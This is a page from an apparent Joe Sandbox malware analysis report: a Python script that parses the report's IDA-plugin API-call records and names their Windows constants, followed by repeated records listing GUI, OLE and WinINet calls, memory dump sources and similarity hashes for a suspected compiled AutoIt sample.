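```python
"""Parse Joe Sandbox IDA-plugin 'APIs' bullet lines into structured call records
and name the raw hex constants they carry.

Added example for this page: not Joe Sandbox code and not code from the analysed
sample. SAMPLE_RECORDS is a constructed subset copied from the records on this
page; the constant tables hold Windows SDK values (winuser.h, wingdi.h, wininet.h)."""
import re
from typing import Optional

# Constructed input: API lines copied from records on this page.
SAMPLE_RECORDS = """\
• SendMessageW.USER32(00000000,00000143,00000000,?), ref: 003A6761
• SendMessageW.USER32(?,0000014E,00000000,00000000), ref: 003A676C
  • Part of subcall function 00321D35: GetStockObject.GDI32(00000011), ref: 00321D87
  • Part of subcall function 00321D35: SendMessageW.USER32(00000000,00000030,00000000), ref: 00321D91
• GetSysColor.USER32(00000012), ref: 003A6C8B
• GetWindowTextLengthW.USER32(00000000), ref: 003A69A2
• SendMessageW.USER32(?,000000B1,00000000,00000000), ref: 003A69B1
• _memset.LIBCMT ref: 00382A22
• GetMenuItemInfoW.USER32(00000030,?,00000000,00000030), ref: 00382A41
• InternetOpenW.WININET(?,00000000,00000000,00000000,00000000), ref: 0039222C
• InternetSetOptionW.WININET(00000000,00000032,?,00000008), ref: 00392255
• SendMessageW.USER32(?,000001A2,000000FF,?), ref: 00378E73
"""

# Windows SDK constants for the values that appear in these records.
WINDOW_MESSAGES = {
    0x0030: "WM_SETFONT",
    0x00B1: "EM_SETSEL",
    0x0143: "CB_ADDSTRING",
    0x014E: "CB_SETCURSEL",
    0x01A2: "LB_FINDSTRINGEXACT",
}
STOCK_OBJECTS = {17: "DEFAULT_GUI_FONT"}
SYS_COLORS = {18: "COLOR_BTNTEXT"}
# Option 50 takes an 8-byte INTERNET_CONNECTED_INFO, matching the 00000008 length argument.
INTERNET_OPTIONS = {50: "INTERNET_OPTION_CONNECTED_STATE"}

# One bullet line: optional "Part of subcall function XXXX:" prefix, API.MODULE,
# optional "(args)", then "ref: ADDR". Headings and hash lines do not match.
_LINE = re.compile(
    r"^\s*•\s*(?:Part of subcall function (?P<sub>[0-9A-Fa-f]+):\s*)?"
    r"(?P<api>\w+)\.(?P<mod>\w+)"
    r"(?:\((?P<args>[^)]*)\))?,?\s*ref:\s*(?P<ref>[0-9A-Fa-f]+)\s*$"
)


def _arg(args: list, index: int) -> Optional[int]:
    """Argument `index` as an int, or None when the report shows '?' or omits it."""
    if index >= len(args) or args[index] == "?":
        return None
    return int(args[index], 16)


def annotate(api: str, args: list) -> str:
    """Name the constant an analyst would otherwise look up by hand; '' if none applies."""
    if api == "SendMessageW":
        msg = _arg(args, 1)                      # uMsg
        if msg is not None:
            return WINDOW_MESSAGES.get(msg, f"unknown message 0x{msg:X}")
    elif api == "InternetSetOptionW":
        opt = _arg(args, 1)                      # dwOption
        if opt is not None:
            return INTERNET_OPTIONS.get(opt, f"unknown option {opt}")
    elif api == "GetStockObject":
        obj = _arg(args, 0)
        if obj is not None:
            return STOCK_OBJECTS.get(obj, f"unknown stock object {obj}")
    elif api == "GetSysColor":
        idx = _arg(args, 0)
        if idx is not None:
            return SYS_COLORS.get(idx, f"unknown colour index {idx}")
    return ""


def parse_records(text: str) -> list:
    """Turn bullet lines into dicts keyed by API, module, args, ref and annotation."""
    calls = []
    for line in text.splitlines():
        m = _LINE.match(line)
        if not m:
            continue
        raw = m.group("args")
        args = [a.strip() for a in raw.split(",")] if raw else []
        calls.append({
            "api": m.group("api"),
            "module": m.group("mod"),
            "args": args,
            "ref": int(m.group("ref"), 16),
            "subcall_of": int(m.group("sub"), 16) if m.group("sub") else None,
            "note": annotate(m.group("api"), args),
        })
    return calls


if __name__ == "__main__":
    for c in parse_records(SAMPLE_RECORDS):
        where = f"{c['ref']:08X}" + (f" (via {c['subcall_of']:08X})" if c["subcall_of"] else "")
        print(f"{where:<22} {c['module']}!{c['api']:<22} {c['note']}")
```

Arguments the sandbox could not resolve are shown as "?" in the report and are carried through as None rather than guessed. The script only interprets numeric arguments; the "<local>" string in the WinINet record is, in WinINet's proxy bypass syntax, the entry that exempts intranet addresses from the proxy, and is left to the reader. Whether these GUI and WinINet routines belong to the runtime of the compiled AutoIt script the report suspects, rather than to the script's own logic, is not something this page settles.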
APIs
  • Part of subcall function 00327DE1: _memmove.LIBCMT ref: 00327E22
  • Part of subcall function 0037AA99: GetClassNameW.USER32(?,?,000000FF), ref: 0037AABC
• SendMessageW.USER32(?,000001A2,000000FF,?), ref: 00378E73
Strings
Memory Dump Source
• Source File: 00000000.00000002.2164672628.0000000000321000.00000020.00000001.01000000.00000003.sdmp, Offset: 00320000, based on PE: true
• Associated: 00000000.00000002.2164595977.0000000000320000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2164885381.00000000003AF000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2164885381.00000000003D4000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2164979334.00000000003DE000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2165079052.00000000003E7000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_320000_19d6P55zd1.jbxd
Similarity
• API ID: ClassMessageNameSend_memmove
• String ID: ComboBox$ListBox
• API String ID: 372448540-1403004172
                                                                                                                    • Opcode ID: 73026fb85d17cacf8db6acbded0c575a1da8f058dcbd15d02bf7911f8aee5a21
                                                                                                                    • Instruction ID: 6c769de75d031583c7b95ddd48206ee5c42be50e4a53da46549446039b778b44
                                                                                                                    • Opcode Fuzzy Hash: 73026fb85d17cacf8db6acbded0c575a1da8f058dcbd15d02bf7911f8aee5a21
                                                                                                                    • Instruction Fuzzy Hash: 6F01F572645228AB8B26EBA0CC46CFE736CAF06320B044A19F8255B6E1EF355808D690
                                                                                                                    APIs
                                                                                                                      • Part of subcall function 00327DE1: _memmove.LIBCMT ref: 00327E22
                                                                                                                      • Part of subcall function 0037AA99: GetClassNameW.USER32(?,?,000000FF), ref: 0037AABC
                                                                                                                    • SendMessageW.USER32(?,00000180,00000000,?), ref: 00378D6B
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.2164672628.0000000000321000.00000020.00000001.01000000.00000003.sdmp, Offset: 00320000, based on PE: true
                                                                                                                    • Associated: 00000000.00000002.2164595977.0000000000320000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2164885381.00000000003AF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2164885381.00000000003D4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2164979334.00000000003DE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2165079052.00000000003E7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_320000_19d6P55zd1.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: ClassMessageNameSend_memmove
                                                                                                                    • String ID: ComboBox$ListBox
                                                                                                                    • API String ID: 372448540-1403004172
                                                                                                                    • Opcode ID: 4d12126e02d4b03e43d47a142572d37b3173bfde541e9bfd615c79f13196a2e0
                                                                                                                    • Instruction ID: 4b8db47b26e3e5de185b9eb18469c20fd93e297c9af97e1244bf15ff0c0b3691
                                                                                                                    • Opcode Fuzzy Hash: 4d12126e02d4b03e43d47a142572d37b3173bfde541e9bfd615c79f13196a2e0
                                                                                                                    • Instruction Fuzzy Hash: B801F772B81118ABCB37EBE0D956EFE77ACDF15340F104019B8096B2E1DE255E08D2B1
                                                                                                                    APIs
                                                                                                                      • Part of subcall function 00327DE1: _memmove.LIBCMT ref: 00327E22
                                                                                                                      • Part of subcall function 0037AA99: GetClassNameW.USER32(?,?,000000FF), ref: 0037AABC
                                                                                                                    • SendMessageW.USER32(?,00000182,?,00000000), ref: 00378DEE
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.2164672628.0000000000321000.00000020.00000001.01000000.00000003.sdmp, Offset: 00320000, based on PE: true
                                                                                                                    • Associated: 00000000.00000002.2164595977.0000000000320000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2164885381.00000000003AF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2164885381.00000000003D4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2164979334.00000000003DE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2165079052.00000000003E7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_320000_19d6P55zd1.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: ClassMessageNameSend_memmove
                                                                                                                    • String ID: ComboBox$ListBox
                                                                                                                    • API String ID: 372448540-1403004172
                                                                                                                    • Opcode ID: d32c4455db4bf96c668cc02ff77d11e4ef7a238f26f8698e23632a1fddbbadb3
                                                                                                                    • Instruction ID: c6b74dfe117ca1ed44d05c4913eeb6095b92fa67a406c1c78c57951359e7f0e5
                                                                                                                    • Opcode Fuzzy Hash: d32c4455db4bf96c668cc02ff77d11e4ef7a238f26f8698e23632a1fddbbadb3
                                                                                                                    • Instruction Fuzzy Hash: D9012B72A85118B7CB37E7E4D956EFE77ACDF11300F104015B809A72D1DE254E08D2B1
                                                                                                                    APIs
                                                                                                                    • VariantInit.OLEAUT32(?), ref: 0037C534
                                                                                                                      • Part of subcall function 0037C816: _memmove.LIBCMT ref: 0037C860
                                                                                                                      • Part of subcall function 0037C816: VariantInit.OLEAUT32(00000000), ref: 0037C882
                                                                                                                      • Part of subcall function 0037C816: VariantCopy.OLEAUT32(00000000,?), ref: 0037C88C
                                                                                                                    • VariantClear.OLEAUT32(?), ref: 0037C556
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.2164672628.0000000000321000.00000020.00000001.01000000.00000003.sdmp, Offset: 00320000, based on PE: true
                                                                                                                    • Associated: 00000000.00000002.2164595977.0000000000320000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2164885381.00000000003AF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2164885381.00000000003D4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2164979334.00000000003DE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2165079052.00000000003E7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_320000_19d6P55zd1.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: Variant$Init$ClearCopy_memmove
                                                                                                                    • String ID: d}=
                                                                                                                    • API String ID: 2932060187-1919349060
                                                                                                                    • Opcode ID: 3480e730613060263f486fb3e898f0d0620507d9e3b9985a3cc4073775e90d03
                                                                                                                    • Instruction ID: 2b328790d58cd7ee990ecf8de3d54f4ee59d611ec3e96be6528d85c2b7687feb
                                                                                                                    • Opcode Fuzzy Hash: 3480e730613060263f486fb3e898f0d0620507d9e3b9985a3cc4073775e90d03
                                                                                                                    • Instruction Fuzzy Hash: 63111E729007089FC721DFAAD88499AF7F8FF18310B50862FE58AD7611E771AA44CF90
                                                                                                                    APIs
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.2164672628.0000000000321000.00000020.00000001.01000000.00000003.sdmp, Offset: 00320000, based on PE: true
                                                                                                                    • Associated: 00000000.00000002.2164595977.0000000000320000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2164885381.00000000003AF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2164885381.00000000003D4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2164979334.00000000003DE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2165079052.00000000003E7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_320000_19d6P55zd1.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: ClassName_wcscmp
                                                                                                                    • String ID: #32770
                                                                                                                    • API String ID: 2292705959-463685578
                                                                                                                    • Opcode ID: 60cff8edd10f043c1bc07aafa57ee7bc437a7e963c0a58677593bfbab7670d0d
                                                                                                                    • Instruction ID: 428c44c9f24d4f623224ba7193a959b569a078940a9c419e2452f83fed9de309
                                                                                                                    • Opcode Fuzzy Hash: 60cff8edd10f043c1bc07aafa57ee7bc437a7e963c0a58677593bfbab7670d0d
                                                                                                                    • Instruction Fuzzy Hash: 8CE061336003282BD3219795AC45FA7F7ECDB52B70F000157FD00D7040D560AA0187D0
                                                                                                                    APIs
                                                                                                                      • Part of subcall function 0035B314: _memset.LIBCMT ref: 0035B321
                                                                                                                      • Part of subcall function 00340940: InitializeCriticalSectionAndSpinCount.KERNEL32(?,00000000,?,0035B2F0,?,?,?,0032100A), ref: 00340945
                                                                                                                    • IsDebuggerPresent.KERNEL32(?,?,?,0032100A), ref: 0035B2F4
                                                                                                                    • OutputDebugStringW.KERNEL32(ERROR : Unable to initialize critical section in CAtlBaseModule,?,?,?,0032100A), ref: 0035B303
                                                                                                                    Strings
                                                                                                                    • ERROR : Unable to initialize critical section in CAtlBaseModule, xrefs: 0035B2FE
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.2164672628.0000000000321000.00000020.00000001.01000000.00000003.sdmp, Offset: 00320000, based on PE: true
                                                                                                                    • Associated: 00000000.00000002.2164595977.0000000000320000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2164885381.00000000003AF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2164885381.00000000003D4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2164979334.00000000003DE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2165079052.00000000003E7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_320000_19d6P55zd1.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: CountCriticalDebugDebuggerInitializeOutputPresentSectionSpinString_memset
                                                                                                                    • String ID: ERROR : Unable to initialize critical section in CAtlBaseModule
                                                                                                                    • API String ID: 3158253471-631824599
                                                                                                                    • Opcode ID: 32824bb1b8189b0fb029dc3797ee18f7dd03a3d74d65ea00c221942eb2bbc638
                                                                                                                    • Instruction ID: aa125dfd12d74213df377b25953eb36d0bcee6d536b74b47e9e7294e1dd42dd9
                                                                                                                    • Opcode Fuzzy Hash: 32824bb1b8189b0fb029dc3797ee18f7dd03a3d74d65ea00c221942eb2bbc638
                                                                                                                    • Instruction Fuzzy Hash: A0E092782007508FD723DF78E504B42BBE8AF00305F008E6CE896DB261E7B4E808CBA1
                                                                                                                    APIs
                                                                                                                    • GetSystemDirectoryW.KERNEL32(?), ref: 00361775
                                                                                                                      • Part of subcall function 0039BFF0: LoadLibraryA.KERNEL32(kernel32.dll,?,0036195E,?), ref: 0039BFFE
                                                                                                                      • Part of subcall function 0039BFF0: GetProcAddress.KERNEL32(00000000,GetSystemWow64DirectoryW), ref: 0039C010
                                                                                                                    • FreeLibrary.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,00000104), ref: 0036196D
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.2164672628.0000000000321000.00000020.00000001.01000000.00000003.sdmp, Offset: 00320000, based on PE: true
                                                                                                                    • Associated: 00000000.00000002.2164595977.0000000000320000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2164885381.00000000003AF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2164885381.00000000003D4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2164979334.00000000003DE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2165079052.00000000003E7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_320000_19d6P55zd1.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: Library$AddressDirectoryFreeLoadProcSystem
                                                                                                                    • String ID: WIN_XPe
                                                                                                                    • API String ID: 582185067-3257408948
                                                                                                                    • Opcode ID: 60ba767de972f963b7d92949fe8b20190831c29ff462f8cce2af810e4603f833
                                                                                                                    • Instruction ID: b2b8d5af51576706eb3f4727a8065c5eaf15810a509dd386fde16104b5d08f24
                                                                                                                    • Opcode Fuzzy Hash: 60ba767de972f963b7d92949fe8b20190831c29ff462f8cce2af810e4603f833
                                                                                                                    • Instruction Fuzzy Hash: 13F0C272800109DFDB27DBA1DA88AECBBFCAB18301F684095E102A64A4D7719F84DF60
                                                                                                                    APIs
                                                                                                                    • FindWindowW.USER32(Shell_TrayWnd,00000000), ref: 003A596E
                                                                                                                    • PostMessageW.USER32(00000000,00000111,00000197,00000000), ref: 003A5981
                                                                                                                      • Part of subcall function 00385244: Sleep.KERNEL32(?,00000000,?,?,?,?,?,?,?,?,?,?), ref: 003852BC
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.2164672628.0000000000321000.00000020.00000001.01000000.00000003.sdmp, Offset: 00320000, based on PE: true
                                                                                                                    • Associated: 00000000.00000002.2164595977.0000000000320000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2164885381.00000000003AF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2164885381.00000000003D4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2164979334.00000000003DE000.00000004.00000001.01000000.00000003.sdmpDownload File
• Associated: 00000000.00000002.2165079052.00000000003E7000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_320000_19d6P55zd1.jbxd
Similarity
• API ID: FindMessagePostSleepWindow
• String ID: Shell_TrayWnd
• API String ID: 529655941-2988720461
• Opcode ID: 25bc3c7f64beaa68ddbb71facde3a0b9d13834f74afd15a5cae13da4abf5822c
• Instruction ID: f86f0859c5d4731568448b11e604e4b6b60a19d6a538cd8813269b257dcbc4b9
• Opcode Fuzzy Hash: 25bc3c7f64beaa68ddbb71facde3a0b9d13834f74afd15a5cae13da4abf5822c
• Instruction Fuzzy Hash: 9DD0C936784311BAE665BBB0AC4BFD66A59AB02B51F000825B249AA1E0C9E0A800C654
APIs
• FindWindowW.USER32(Shell_TrayWnd,00000000), ref: 003A59AE
• PostMessageW.USER32(00000000), ref: 003A59B5
  • Part of subcall function 00385244: Sleep.KERNEL32(?,00000000,?,?,?,?,?,?,?,?,?,?), ref: 003852BC
Strings
Memory Dump Source
• Source File: 00000000.00000002.2164672628.0000000000321000.00000020.00000001.01000000.00000003.sdmp, Offset: 00320000, based on PE: true
• Associated: 00000000.00000002.2164595977.0000000000320000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2164885381.00000000003AF000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2164885381.00000000003D4000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2164979334.00000000003DE000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2165079052.00000000003E7000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_320000_19d6P55zd1.jbxd
Similarity
• API ID: FindMessagePostSleepWindow
• String ID: Shell_TrayWnd
• API String ID: 529655941-2988720461
• Opcode ID: ec5c197ec957d21238c423ec7816372226ad918c839269d1dfd80f3300d27c16
• Instruction ID: 9c6516579040aaf8da76f6d7eb897a4e5883b01be4bbb744f4d0e3590bd88808
• Opcode Fuzzy Hash: ec5c197ec957d21238c423ec7816372226ad918c839269d1dfd80f3300d27c16
• Instruction Fuzzy Hash: E0D0C9327803117AE666BBB0AC4BFD66659AB06B51F000825B245AA1E0C9E0A800C658